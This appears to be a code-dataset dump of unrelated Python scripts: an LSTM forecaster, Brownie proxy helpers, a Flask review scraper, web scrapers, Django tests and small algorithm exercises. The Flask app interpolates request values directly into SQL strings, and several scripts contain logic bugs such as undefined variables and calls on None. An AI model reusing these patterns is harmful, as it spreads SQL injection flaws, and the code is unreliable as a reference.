20, 30, 40, 50, 60, 70, 80, 90, 100])\n axes.set_xticklabels([])\n\n # Plot the original dataset\n plt.plot(dataset, 'b', label='Received Marks Dataset')\n plt.legend(loc='best')\n\n for x in forecast_predict:\n if x > 100:\n x = 100\n\n # Plot the prediction line onto the graph\n plt.plot([None for _ in range(look_back)] +\n [None for _ in training_prediction] +\n [None for _ in test_predict] +\n [x for x in forecast_predict], 'r', label='Marks Prediction Line')\n plt.legend(loc='best')\n\n for x in forecast_predict:\n if x < 50 and sys.argv[2] == \"1\":\n print(\"Student failure possibility\")\n break\n\n plt.axhline(y=50, color='k', linestyle='--', label='50 Percent Line')\n plt.legend(loc='best')\n\n # Draw the final plot\n plt.savefig(\"./graphs/\" + sys.argv[3] + \".png\")\n # plt.show()\n\ndef main():\n\n # Sends of data to be loaded\n filename = \"./data/\" + sys.argv[1]\n dataset, mmscale = load_dataset(filename)\n\n # Split the data into the training and test sets (20% into the look back and 70* into the training set)\n look_back = int(len(dataset) * 0.20)\n training_size = int(len(dataset) * 0.70)\n\n # Call the data split\n train, test = split_dataset(dataset, training_size, look_back)\n\n # Reshaping and creating the datasets ( X = t and Y = t + 1 for the LSTM )\n train_x, train_y = create_dataset(train, look_back)\n test_x, test_y = create_dataset(test, look_back)\n\n # Use numpy to reshape the input to the format [samples, time steps, features]\n train_x = numpy.reshape( train_x, (train_x.shape[0], train_x.shape[1], 1) )\n test_x = numpy.reshape( test_x, (test_x.shape[0], test_x.shape[1], 1) )\n\n # Create the Multilayer Perceptron Model and fit it\n batch_size = 1\n model = build_model(look_back, batch_size=batch_size)\n for _ in trange(100, desc='fitting model\\t', mininterval=1.0):\n model.fit(train_x, train_y, nb_epoch=1, batch_size=batch_size, verbose=0, shuffle=False)\n model.reset_states()\n\n # Get the predictions for the training\n training_prediction = model.predict(train_x, batch_size)\n test_predict = model.predict(test_x, batch_size)\n\n # Complete the general forecasting to create the prediction results to display\n forecast_predict = generate_forecast(model, test_x[-1::], timesteps=100, batch_size=batch_size)\n\n # Invert all datasets and predictions\n dataset = mmscale.inverse_transform(dataset)\n training_prediction = mmscale.inverse_transform(training_prediction)\n train_y = mmscale.inverse_transform([train_y])\n test_predict = mmscale.inverse_transform(test_predict)\n test_y = mmscale.inverse_transform([test_y])\n forecast_predict = mmscale.inverse_transform(forecast_predict)\n\n # Get the root mean square (For testing)\n #train_score = numpy.sqrt(mean_squared_error(train_y[0], training_prediction[:, 0]))\n #print('Train Score: %.2f RMSE' % train_score)\n #test_score = numpy.sqrt(mean_squared_error(test_y[0], test_predict[:, 0]))\n #print('Test Score: %.2f RMSE' % test_score)\n\n plot_data(dataset, look_back, training_prediction, test_predict, forecast_predict)\n\nif __name__ == '__main__':\n main()\n","repo_name":"TimeSeriesPrediction/time-series-server","sub_path":"time-series-analysis-engine.py","file_name":"time-series-analysis-engine.py","file_ext":"py","file_size_in_byte":8811,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"13494416549","text":"from brownie import (\n accounts,\n network,\n config,\n)\n\nimport eth_utils\n\nLOCAL_BLOCKCHAIN_ENVIRONMENTS = [\"development\", \"hardhat\", \"local-ganache\"]\n\n\ndef get_account(index=None, id=None):\n if index:\n return accounts[index]\n if id:\n return accounts.load(id)\n if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS:\n return accounts[0]\n return accounts.add(config[\"wallets\"][\"from_key\"])\n\n\ndef encode_function_data(initializer=None, *args):\n # initializer=box.store, 1,2,3,4,5,6,7 etc (for any optional args to pass to initializer function)\n # returns the encoded bytes or an empty hex string if no args\n if len(args) == 0 or not initializer:\n return eth_utils.to_bytes(hexstr=\"0x\")\n return initializer.encode_input(*args)\n\n\ndef upgrade(\n account,\n proxy,\n new_implementation_address,\n proxy_admin_contract=None,\n initializer=None,\n *args,\n):\n transaction = None\n if proxy_admin_contract:\n if initializer:\n encoded_function_call = encode_function_data(initializer, *args)\n transaction = proxy_admin_contract.upgradeAndCall(\n proxy.address,\n new_implementation_address,\n encoded_function_call,\n {\"from\": account},\n )\n else:\n transaction = proxy_admin_contract.upgrade(\n proxy.address, new_implementation_address, {\"from\": account}\n )\n else:\n if initializer:\n encoded_function_call = encode_function_data(initializer, *args)\n transaction = proxy_admin_contract.upgradeToAndCall(\n new_implementation_address, encoded_function_call, {\"from\": account}\n )\n else:\n transaction = proxy.upgradeTo(new_implementation_address, {\"from\": account})\n return transaction\n","repo_name":"Valodax/Web3-Python","sub_path":"proxy-upgrade/scripts/helpful_scripts.py","file_name":"helpful_scripts.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1020623000","text":"import random\nimport sqlite3\nimport time\nfrom math import exp, pi, sqrt\nfrom typing import List, Optional, Tuple\n\nfrom numbsql import create_function, sqlite_udf\n\n\n@sqlite_udf # type: ignore[misc]\ndef normal(x: float, mu: float, sigma: float) -> Optional[float]:\n c = 1.0 / (sigma * sqrt(2.0 * pi))\n return c * exp(-0.5 * ((x - mu) / sigma) ** 2.0)\n\n\ndef oldnormal(x: float, mu: float, sigma: float) -> float:\n c = 1.0 / (sigma * sqrt(2.0 * pi))\n return c * exp(-0.5 * ((x - mu) / sigma) ** 2.0)\n\n\nif __name__ == \"__main__\":\n con = sqlite3.connect(\":memory:\")\n con.execute(\"CREATE TABLE t (random_numbers DOUBLE PRECISION)\")\n\n random_numbers: List[Tuple[float]] = [(random.random(),) for _ in range(50000)]\n con.executemany(\"INSERT INTO t VALUES (?)\", random_numbers)\n\n # new way of registering C functions\n create_function(con, \"normal\", 3, normal, deterministic=True)\n\n # old way\n con.create_function(\"oldnormal\", 3, oldnormal)\n query1 = \"select normal(random_numbers, 0.0, 1.0) from t\"\n query2 = \"select oldnormal(random_numbers, 0.0, 1.0) from t\"\n\n start1 = time.time()\n exe1 = con.execute(query1)\n result1 = list(exe1)\n t1 = time.time() - start1\n\n start2 = time.time()\n exe2 = con.execute(query2)\n result2 = list(exe2)\n t2 = time.time() - start2\n\n print(result1 == result2)\n print(f\"t1 == {t1:.2f}\")\n print(f\"t2 == {t1:.2f}\")\n","repo_name":"cpcloud/numbsql","sub_path":"examples/scalar.py","file_name":"scalar.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"76"} +{"seq_id":"29052548034","text":"from database import connectToDatabase\nfrom product import getProduct\nfrom review import *\nfrom label import prepareLabels\nfrom bs4 import BeautifulSoup\nfrom flask import Flask, request, jsonify\nimport json\nimport html\n\napp = Flask(__name__)\ncur = connectToDatabase() #create a universal cursor (used by all methods) for the database\n\n\ndef returnResult(**kwargs):\n \"\"\"returns the data obtained from the database query and formats it into JSON\"\"\"\n response = jsonify(kwargs)\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response\n\n@app.route('/scraping', methods=['POST', \"GET\"])\ndef crawl():\n \"\"\"Crawls Amazon products and stores the result in a database\"\"\"\n url = request.form['key'] #get the URL from the AJAX call\n try:\n cap = [i for i, c in enumerate(url) if c == \"/\"][2] #checks for the second occurence of \"/\" to find the cap that separates the domain from the rest of the URL\n if url[:cap] != 'https://www.amazon.com': #if it is not an Amazon.com link, return an error\n return returnResult(result=\"InvalidURL\")\n except IndexError: #if it does not resemble the amazon domain, also return an error\n return returnResult(result=\"InvalidURL\")\n pageSource = getHTML(url) #get the HTML code of the page\n bs = BeautifulSoup(pageSource, 'html.parser') #and create a BS object for parsing\n if cur == 0: #if the connection to the database failed, return an error\n return returnResult(result=\"InvalidDatabaseConnection\")\n product = getProduct(bs, cur) #get the product information\n if type(product) == str: #if it is a duplicate, product name is returned since no product was stored in the database. Also, no reviews are scraped (already stored in the database)\n cur.execute(f\"SELECT * FROM products WHERE product_name = '{product}'\")\n product = cur.fetchall()[0][0] #get the id of the product and return it for results.php since it must be put into the query string\n return returnResult(result=\"IntegrityError\", product_id=product)\n else: #else, scrape the reviews of the prodcut\n for i in range(1, 6): #go through each star-review (i.e., 1 star reviews, 2 stars reviews, etc.)\n getReviews(bs, cur, product, 1, i) #store the reviews in the database\n return returnResult(result=\"Success\", product_id=product)\n\n@app.route('/filter', methods=['POST', \"GET\"])\ndef applyFilter():\n \"\"\"use the filter values and return the reviews that match the description\"\"\"\n product_id = request.form['product_id']\n label = html.escape(request.form['target']) #escape the characters \n if label != \"0\": #if a label was passed into the AJAX call, the reviews table must be joined with the reviews_labels and labels, since they hold the information on which review has which label\n query_string = f\"SELECT * FROM reviews r LEFT JOIN reviews_labels rl ON r.id = rl.review_id LEFT JOIN labels l ON rl.label_id = l.id WHERE r.product_id = '{product_id}'\"\n query_string += f\" AND l.label = '{label}' AND l.target = '1'\" \n prepareLabels(cur, product_id, label) \n else: #if no label was passed, the reviews table is sufficient\n query_string = f\"SELECT * FROM reviews r WHERE r.product_id = '{product_id}'\"\n stars = json.loads(request.form['star'])\n if len(stars) != 0: #iterate through each star and add its condition to the query string\n star_filter = \" AND (\"\n for i in stars:\n star_filter += f\"r.stars = '{i}' OR \" #OR because its not exclusive\n query_string += star_filter[:-4]+\")\" #remove the last OR that was added and close the parenthesis\n start_date = request.form['start']\n if start_date != \"0\":\n query_string += f\" AND r.published >= '{start_date}'\"\n end_date = request.form['end']\n if end_date != \"0\":\n query_string += f\" AND r.published <= '{end_date}'\"\n cur.execute(query_string) #execute the query \n results = cur.fetchall() #and gather the results\n cur.execute(f\"SELECT * FROM products WHERE id = '{product_id}'\") #also, the webpage displays information about the prodcut, so return this as well\n product = cur.fetchall()[0]\n if len(results) == 0: #if no reviews match the filter, just return the product information\n return returnResult(result=\"EmptyResults\", name=product[1], brand=product[2], price=product[3], product_stars=product[4], num_reviews=product[5])\n else: #if reviews match it, return both\n return returnResult(result=\"Success\", stars=[i[1] for i in results], content=[html.unescape(i[2]) for i in results], published=[i[3] for i in results], \\\n name=product[1], brand=product[2], price=product[3], product_stars=product[4], num_reviews=product[5])\n\n\n","repo_name":"Mato-T/Web-App","sub_path":"Python/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32271584954","text":"\nn, V = map(int, input().split())\nv = [int(x) for x in input().split()]\n\nmid = n // 2\n\ndef solve(len, step):\n arr = []\n for i in range(len):\n arr.append(v[i + step])\n\n F = [0] * len\n s = []\n def snp(i):\n if i == len:\n sum = 0\n for j in range(len):\n if F[j] == 1:\n sum += arr[j]\n s.append(sum)\n return\n F[i] = 0\n snp(i+1)\n F[i] = 1\n snp(i+1)\n snp(0)\n return s\n\nsum1 = solve(mid, 0)\nsum2 = solve(n - mid, mid)\nMax = 0\n\nfor i in range(len(sum1)):\n for j in range(len(sum2)):\n if sum1[i] + sum2[j] <= V:\n Max = max(Max, sum1[i] + sum2[j])\n\nprint(Max)\n\n# F = [0] * n\n# Max = 0\n#\n# def snp(i):\n# global Max\n# s = []\n# if i == n:\n# sum = 0\n# for j in range(n):\n# if F[j] == 1:\n# sum += v[j]\n# if sum <= V:\n# Max = max(Max, sum)\n# return\n# F[i] = 0\n# snp(i+1)\n# F[i] = 1\n# snp(i+1)\n#\n# snp(0)\n# print(Max)","repo_name":"LecterW/Introductory","sub_path":"CHUNGCAKE_Banhchung.py","file_name":"CHUNGCAKE_Banhchung.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8030112020","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 2 14:29:05 2015\n@author: cgilbert\n\"\"\"\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\ndef getContentFromUrl(url):\n\t# Execute a request to get the content from a web page\n\trequest = requests.get(url)\n\t# Parse the document\n\tsoup = BeautifulSoup(request.text, 'html.parser')\n\treturn soup\n\n#def lienFromUrl(url)\n\nurl='http://www.leboncoin.fr/voitures/offres/ile_de_france/?f=a&th=1&q=Renault+Zo%C3%A9'\n\ndef getLienFromUrl(url):\n soup = getContentFromUrl(url);\n list_bloc=soup.find(\"div\", { \"class\" : \"list-lbc\" })\n list_article=list_bloc.findAll('a',href=True)\n liste_lien=[]\n for article in list_article:\n lien=str(article['href'])\n liste_lien.append(lien)\n return liste_lien\n\nliste_lien=getLienFromUrl(url)\n\ndef getVersionFromSoup(soup_lien):\n content=str(soup_lien.find(\"div\", { \"class\" : \"content\" }))\n searchObjVersion = re.search( r'intens|life|zen', content, re.M|re.I)\n if not(searchObjRenault is None):\n version=(searchObjVersion.group()).lower()\n else:\n version=\"version non renseignée\"\n return version\n\ndef getPriceFromSoup(soup):\n price=soup.find(\"div\", { \"class\" : \"lbcParams withborder\" }).find(\"span\", { \"class\" : \"price\" })\n return(str(price['content']))\n\ndef getDateFromSoup(soup):\n release_date=soup.find(\"div\", { \"class\" : \"lbcParams criterias\" }).find(\"td\", { \"itemprop\" : \"releaseDate\" }).string\n return str(int(release_date))\n\ndef getKmFromSoup(soup):\n km_dirty=soup.find(\"div\", { \"class\" : \"lbcParams criterias\" }).findAll(\"td\")[3].string\n km=km_dirty.replace(\" \",\"\").replace(\"KM\",\"\")\n return km\n\ndef getSellerFromSoup(soup):\n param=soup.find(\"div\", { \"class\" : \"upload_by\" }).find(\"span\", { \"class\" : \"ad_pro\" })\n if param is None:\n seller='particulier'\n else:\n seller='pro'\n return seller\n\ndef getCoteFromVersionDate(version,date):\n non_decimal = re.compile(r'[^\\d.]+')\n url_cote='http://www.lacentrale.fr/cote-auto-renault-zoe-'+version+'+charge+rapide-'+date+'.html'\n soup_dirty=getContentFromUrl(url_cote)\n cote_dirty=soup_dirty.find(\"span\", { \"class\" : \"Result_Cote arial tx20\" }).string\n return(non_decimal.sub('', cote_dirty))\n \n\n\n\n\nresult_search=[]\n\nfor lien in liste_lien:\n \n soup_lien=getContentFromUrl(lien)\n titre=str(soup_lien.find(\"div\", { \"class\" : \"header_adview\" })) \n searchObjRenault = re.search( r'renault|zoe|zoé', titre, re.M|re.I)\n \n if not(searchObjRenault is None):\n \n version=getVersionFromSoup(soup_lien)\n price=getPriceFromSoup(soup_lien)\n km=getKmFromSoup(soup_lien)\n date=getDateFromSoup(soup_lien)\n seller=getSellerFromSoup(soup_lien)\n cote=getCoteFromVersionDate(version,date)\n\n \n for i in range(len(versions)):\n if(version==versions[i]):\n cote=cotes[i]\n \n if price>cote:\n commentaire='oui'\n elif price cote ?']\ndf\n\n\n\n# url_zoe='http://www.lacentrale.fr/cote-auto-renault-zoe-intens+charge+rapide-2013.html'\n# soup_zoe_dirty=getContentFromUrl(url_zoe)\n# cote_zoe_dirty=soup_zoe.find(\"span\", { \"class\" : \"Result_Cote arial tx20\" }).string\n# non_decimal = re.compile(r'[^\\d.]+')\n# cote_zoe = non_decimal.sub('', cote_zoe))\n# url='http://www.leboncoin.fr/voitures/827471549.htm?ca=12_s'\n# soup = getContentFromUrl(url)\n\n# def getSellerFromSoup(soup):\n# param=soup.find(\"div\", { \"class\" : \"upload_by\" }).find(\"span\", { \"class\" : \"ad_pro\" }).string\n# if param is None:\n# seller='particulier'\n# else:\n# seller='pro'\n \n# return seller\n ","repo_name":"rachidalili/MS-BGD2015","sub_path":"Cyril_Gilbert/Lesson4/exo_dom_lesson4.py","file_name":"exo_dom_lesson4.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"76"} +{"seq_id":"24791996890","text":"from django.test import TestCase\nimport pytest\nfrom car_rental_app.models import ClientAsk, Client, CarDamage, DamagePart, ReservationOptions\nfrom django.contrib.auth.models import User, Permission\n# Create your tests here.\n\n#dodawanie zapytania\n@pytest.mark.django_db\ndef test_client_ask(client):\n response = client.post('/res_inq_add/', {'car_class': 'mpv', 'start_date': '2021-02-28', 'end_date': '2021-03-02'})\n print(response.content)\n assert ClientAsk.objects.filter(start_date='2021-02-28')\n\n@pytest.mark.django_db\ndef test_add_client(client, authorized_user):\n client.force_login(authorized_user)\n response = client.post('/client_form/', {'name': 'Andrzej', 'surname': 'Golota', 'strname' : 'Koeniga', 'homenum' : '23',\n 'flatnum' : '23', 'idnum' : 'AWX674823', 'dlnum' : '4563/23/8947', 'pesel' : '56022407008',\n 'email' : 'rossfriends@fox.tv', 'phonenum' : '513434434'})\n print(response.content)\n assert Client.objects.filter(flatnum='23')\n\n@pytest.mark.django_db\ndef test_add_car_missing_permission(client, unauthorized_user):\n client.force_login(unauthorized_user)\n response = client.post('/Add_car', {'brand':'opel'})\n print(response.content)\n assert response.status_code == 403\n\n@pytest.mark.django_db\ndef test_add_damage_part(client, authorized_user1):\n client.force_login(authorized_user1)\n response = client.post('/part_add/', {'part': 'front window'})\n print(response.content)\n assert DamagePart.objects.filter(part='front window')\n\n@pytest.mark.django_db\ndef test_add_damage_car(client, authorized_user1, test_car, test_client, test_part):\n client.force_login(authorized_user1)\n response = client.post(\"/Add_damage\", {'date': '2021-02-24', 'd_status': 'unreapaird', 'title': 'Stolen mirror', 'd_note': 'Left mirror has been stolen on parking lot', 'car': [test_car.id], 'driver': [test_client.id], 'damage_part': test_part.id})\n print(response.content)\n assert CarDamage.objects.filter(date=\"2021-02-24\")\n\n# @pytest.mark.django_db\n# def test_update_reservation(client, unauthorized_user, test_reservation):\n# client.force_login(unauthorized_user)\n# response = client.post(f'/Reservation_Edit/{test_reservation.id}', {'start_date':'2021-01-12'})\n# print(response.content)\n# assert response.status_code == 403\n#\n# @pytest.mark.django_db\n# def test_add_option(client, authorized_user1, test_reservation):\n# client.force_login(authorized_user1)\n# response = client.post('/add_option', {'reservation':test_reservation.id, 'child_seat':'a', 'number_of_cs':'2', 'additional_driver':'NO', 'abolition':'NO', 'insurence':'NO'})\n# print(response.content)\n# assert ReservationOptions.objects.filter(reservation_id=f\"{test_reservation.id}\")","repo_name":"PiotrWyso/Car_Rental_App","sub_path":"car_rental_app/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5753096800","text":"n1 = int(input('Um valor: '))\nn2 = int(input('Outro valor: '))\nprint('A soma vale {}'.format(n1 + n2))\n\n\n\"\"\"\n Desafios\n 005 Faça um programa que leia um número inteiro e mostra na tela o seu sucessoer e antecessor.\n 006 Crie um algoritmo que leia um número que mostra, seu dobro, triplo e raiz quadrada.\n 007 Desenvolva um programa que leia duas notas e mostre a média.\n 008 Escreve um programa que leia um valor em metros e converta para centimetros e milimetros.\n 009 Faça um programa q leia um número inteiro qualquer e mostra na tela sua tabuada.\n 010 Crie um programa que leia quanto dinheiro uma pessoa tem e mostre quantos dólares ela pode comprar US$ 1,00 = R$ 3,27\n 011 Faça um programa que leia a largura e a altura de uma parede em metros, calcule sua área e a quantidade de tinta necessária\n para pintá-la, sabendo que cada litro de tinta pinta uma área de 2m².\n 012 Faça um algoritmo que leia uma preço de um produto e mostre seu novo preço com 5% de desconto.\n 013 Faça um algoritmo que leia o salário de um fuincionário e mostr seu novo salário com aumento de 15%;\n\"\"\"\n","repo_name":"engenheiropierre/cursopython","sub_path":"exercicios/aula07a.py","file_name":"aula07a.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30153890432","text":"import numpy as np\nfrom scipy.ndimage import gaussian_filter\nfrom noise import pnoise1,pnoise2\nfrom scipy.interpolate import griddata\n\nclass terrain:\n def __init__(self,mapWidth,mapHeight,widthScale,heightScale):\n self.mapWidth = mapWidth\n self.mapHeight = mapHeight\n self.meshScale = [widthScale,heightScale,1]\n self.gridX = np.linspace(-(mapWidth-1)/2,(mapWidth-1)/2,mapWidth)*widthScale\n self.gridY = np.linspace(-(mapHeight-1)/2,(mapHeight-1)/2,mapHeight)*heightScale\n self.gridX,self.gridY = np.meshgrid(self.gridX,self.gridY)\n def loadTerrain(self,gridZFile):\n self.gridZ = np.load(gridZFile)\n def robotHeightMap(self,position,heading,mapWidth,mapHeight,mapScale):\n maxRadius = np.sqrt((mapWidth-1)**2+(mapHeight-1)**2)*mapScale/2.\n vecX = self.gridX.reshape(-1)-position[0]\n vecY = self.gridY.reshape(-1)-position[1]\n indices = np.all(np.stack((np.abs(vecX)<=(maxRadius+self.meshScale[0]),np.abs(vecY)<=(maxRadius+self.meshScale[1]))),axis=0)\n vecX = vecX[indices]\n vecY = vecY[indices]\n vecZ = self.gridZ.reshape(-1)[indices]\n relativeX = vecX*np.cos(heading)+vecY*np.sin(heading)\n relativeY = -vecX*np.sin(heading)+vecY*np.cos(heading)\n rMapX = np.linspace(-(mapWidth-1)/2.,(mapWidth-1)/2.,mapWidth)*mapScale\n rMapY = np.linspace((mapHeight-1)/2.,-(mapHeight-1)/2.,mapHeight)*mapScale\n points = np.stack((relativeX,relativeY)).transpose()\n rMapX,rMapY = np.meshgrid(rMapX,rMapY)\n return griddata(points, vecZ, (rMapX,rMapY))-position[2]\n\nif __name__==\"__main__\":\n ter = terrain(1,2,3,4)","repo_name":"robomechanics/clifford_pybullet","sub_path":"cemOptimiziation/terrain.py","file_name":"terrain.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"25384501751","text":"import boto3\n\ndef send_message():\n sqs_client = boto3.client('sqs', region_name='us-east-1')\n queue_url='https://sqs.us-east-1.amazonaws.com/774910682050/fila-teste'\n response = sqs_client.send_message(\n QueueUrl=queue_url,\n DelaySeconds=10,\n MessageBody=(\n 'Hello world!'\n )\n )\n print(response)\n\nif __name__ == '__main__':\n\n response = send_message()","repo_name":"lucascavalcan/aws-sqs-boto","sub_path":"sqs.py","file_name":"sqs.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20626717508","text":"import numpy as np\nimport pandas as pd\n\nmodel = np.load(\"model.npy\")\nw = model\ntest = pd.read_csv(r\"..\\test.csv\", header=None)\nt = test[test[1] == \"PM2.5\"]\nt.drop([0, 1], axis=1, inplace=True)\nt = np.array(t, float)\nt = np.concatenate((np.ones((t.shape[0], 1)), t), axis=1)\n\nres = np.dot(t, w)\n1+1","repo_name":"bgbofficial/NTU-ML-HW","sub_path":"hw1/temp/pridict.py","file_name":"pridict.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38004217115","text":"\r\nimport googlesearch\r\nfrom tkinter import *\r\ntry:\r\n from googlesearch import search\r\nexcept ImportError:\r\n print(\"No module named 'google' found\")\r\n\r\n\r\n\r\nstruct=Tk()\r\nstruct.geometry(\"354x400\") #Defining Size of GUI box\r\nstruct.title(\"My Search Engine\") \r\nlabel=Label(struct,text=\"Personal Search Engine\",bg=\"teal\",fg=\"white\",font=(\"Times\",20,\"bold\"))\r\nlabel.pack(side=TOP) \r\nstruct.config(background=\"teal\")\r\nquery=StringVar()\r\ncountry=StringVar()\r\nnum=IntVar()\r\nstart=IntVar()\r\nstop=IntVar()\r\npause=IntVar()\r\ntld=StringVar()\r\ndef mysearch():\r\n try:\r\n query1 =query.get()\r\n country1 =country.get()\r\n num1 =num.get()\r\n start1 =start.get()\r\n stop1 =stop.get()\r\n pause1 =pause.get()\r\n tld1=tld.get()\r\n file1 = open(query1+\".txt\",\"w\")\r\n except:\r\n clear()\r\n return 0\r\n list1=[]\r\n for j in search(query1 ,country=country1,safe=\"off\", num=num1,start=start1, stop=stop1, pause=pause1):\r\n file1.writelines(j)\r\n file1.writelines(\"\\n\")\r\n #list1.append(j)\r\n print(j)\r\n \r\ndef clear():\r\n query.set(\"\")\r\n country.set(\"\")\r\n num.set(0)\r\n start.set(0)\r\n stop.set(0)\r\n pause.set(0)\r\n tld.set(\"\")\r\n \r\nlabel=Label(struct,text=\"Enter here to search\",bg=\"teal\",fg=\"white\",font=(\"Times\",15,\"bold\"))\r\nlabel.place(x=50,y=100)\r\nlabel=Label(struct,text=\"query\",bg=\"teal\",fg=\"white\",font=(\"Times\",10,\"bold\"))\r\nlabel.place(x=50,y=130)\r\nlabel=Label(struct,text=\"country\",bg=\"teal\",fg=\"white\",font=(\"Times\",10,\"bold\"))\r\nlabel.place(x=50,y=160)\r\nlabel=Label(struct,text=\"num\",bg=\"teal\",fg=\"white\",font=(\"Times\",10,\"bold\"))\r\nlabel.place(x=50,y=190)\r\nlabel=Label(struct,text=\"start\",bg=\"teal\",fg=\"white\",font=(\"Times\",10,\"bold\"))\r\nlabel.place(x=50,y=220)\r\nlabel=Label(struct,text=\"stop\",bg=\"teal\",fg=\"white\",font=(\"Times\",10,\"bold\"))\r\nlabel.place(x=50,y=250)\r\nlabel=Label(struct,text=\"pause\",bg=\"teal\",fg=\"white\",font=(\"Times\",10,\"bold\"))\r\nlabel.place(x=50,y=280)\r\nlabel=Label(struct,text=\"tld\",bg=\"teal\",fg=\"white\",font=(\"Times\",10,\"bold\"))\r\nlabel.place(x=50,y=310)\r\n\r\n\r\n\r\n\r\n\r\n\r\nenter=Entry(struct,font=(\"Times\",10,\"bold\"),textvar=query,width=30,bd=2,bg=\"white\")\r\nenter.place(x=120,y=130)\r\nenter1=Entry(struct,font=(\"Times\",10,\"bold\"),textvar=country,width=30,bd=2,bg=\"white\")\r\nenter1.place(x=120,y=160)\r\nenter=Entry(struct,font=(\"Times\",10,\"bold\"),textvar=num,width=30,bd=2,bg=\"white\")\r\nenter.place(x=120,y=190)\r\nenter1=Entry(struct,font=(\"Times\",10,\"bold\"),textvar=start,width=30,bd=2,bg=\"white\")\r\nenter1.place(x=120,y=220)\r\nenter=Entry(struct,font=(\"Times\",10,\"bold\"),textvar=stop,width=30,bd=2,bg=\"white\")\r\nenter.place(x=120,y=250)\r\nenter1=Entry(struct,font=(\"Times\",10,\"bold\"),textvar=pause,width=30,bd=2,bg=\"white\")\r\nenter1.place(x=120,y=280)\r\nenter1=Entry(struct,font=(\"Times\",10,\"bold\"),textvar=tld,width=30,bd=2,bg=\"white\")\r\nenter1.place(x=120,y=310)\r\n\r\n\r\n\r\nbutton1=Button(struct,text=\"clear\",font=(\"Times\",10,\"bold\"),width=15,bd=2,command=clear)\r\nbutton1.place(x=70,y=340)\r\nbutton=Button(struct,text=\"Search\",font=(\"Times\",10,\"bold\"),width=15,bd=2,command=mysearch)\r\nbutton.place(x=200,y=340)\r\nstruct.mainloop()\r\n\r\nfile1.close()","repo_name":"fawzimestrah/IOT_GoogleEngine","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10794339796","text":"from collections import deque\nn, m, a, b, k = map(int, input().split())\ngraph = [ [0]*(m+1) for _ in range(n+1) ] \nfor _ in range(k):\n x, y, = map(int, input().split())\n graph[x-1][y-1] = 1\nsx, sy = map(int, input().split())\nsx, sy = sx-1, sy-1\ngx, gy = map(int, input().split())\ngx, gy = gx-1, gy-1\n\nQ = deque()\nQ.append((sx,sy,0))\nvisited = [ [0]* (m+1) for _ in range(n+1) ]\nvisited[sx][sy]=1\n\nx_dir = [-1,0,1,0]\ny_dir = [0,1,0,-1]\n\nwhile len(Q) > 0:\n x, y, dist = Q.popleft()\n if x==gx and y==gy:\n print(dist)\n exit()\n for i in range(4):\n dx = x + x_dir[i]\n dy = y + y_dir[i]\n flag=1\n if 0<=dx dx+xx or dx+xx >= n or 0 > dy+yy or dy+yy >= m or graph[dx+xx][dy+yy] == 1:\n flag=0\n break\n if flag==1:\n visited[dx][dy]=1\n Q.append((dx,dy,dist+1))","repo_name":"hyunjinee/Algorithm","sub_path":"solved.ac/python/2194.py","file_name":"2194.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"75"} +{"seq_id":"36999733371","text":"import sys, time, socket, string\nfrom pprint import pprint\nimport threading\n\n##############################################################################################################\n\nDEFAULT_VERBOSITY=0 # 0=quiet, 1=enough to see hand-shaking, 2=detailed\n\n##############################################################################################################\n\n# A possible response to the \"dump_state\" request\ndump1 = \"\"\" 2\n2\n2\n150000.000000 1500000000.000000 0x1ff -1 -1 0x10000003 0x3\n0 0 0 0 0 0 0\n0 0 0 0 0 0 0\n0x1ff 1\n0x1ff 0\n0 0\n0x1e 2400\n0x2 500\n0x1 8000\n0x1 2400\n0x20 15000\n0x20 8000\n0x40 230000\n0 0\n9990\n9990\n10000\n0\n10 \n10 20 30 \n0x3effffff\n0x3effffff\n0x7fffffff\n0x7fffffff\n0x7fffffff\n0x7fffffff\n\"\"\"\n\n# Another possible response to the \"dump_state\" request\ndump2 = \"\"\" 0\n2\n2\n150000.000000 30000000.000000 0x900af -1 -1 0x10 000003 0x3\n0 0 0 0 0 0 0\n150000.000000 30000000.000000 0x900af -1 -1 0x10 000003 0x3\n0 0 0 0 0 0 0\n0 0\n0 0\n0\n0\n0\n0\n\n\n0x0\n0x0\n0x0\n0x0\n0x0\n0\n\"\"\"\n\n\nRIG_MODEL_NETRIGCTL = 2\nRIG_ITU_REGION2 = 2\n\n# See dump_state in rigctl_parse.c for what this means.\ndump3 = \"\".join([\n \"0\\n\", # protocol version\n \"%d\\n\" % RIG_MODEL_NETRIGCTL,\n \"%d\\n\" % RIG_ITU_REGION2,\n \"0 0 0 0 0 0 0\\n\",\n \"0 0 0 0 0 0 0\\n\",\n 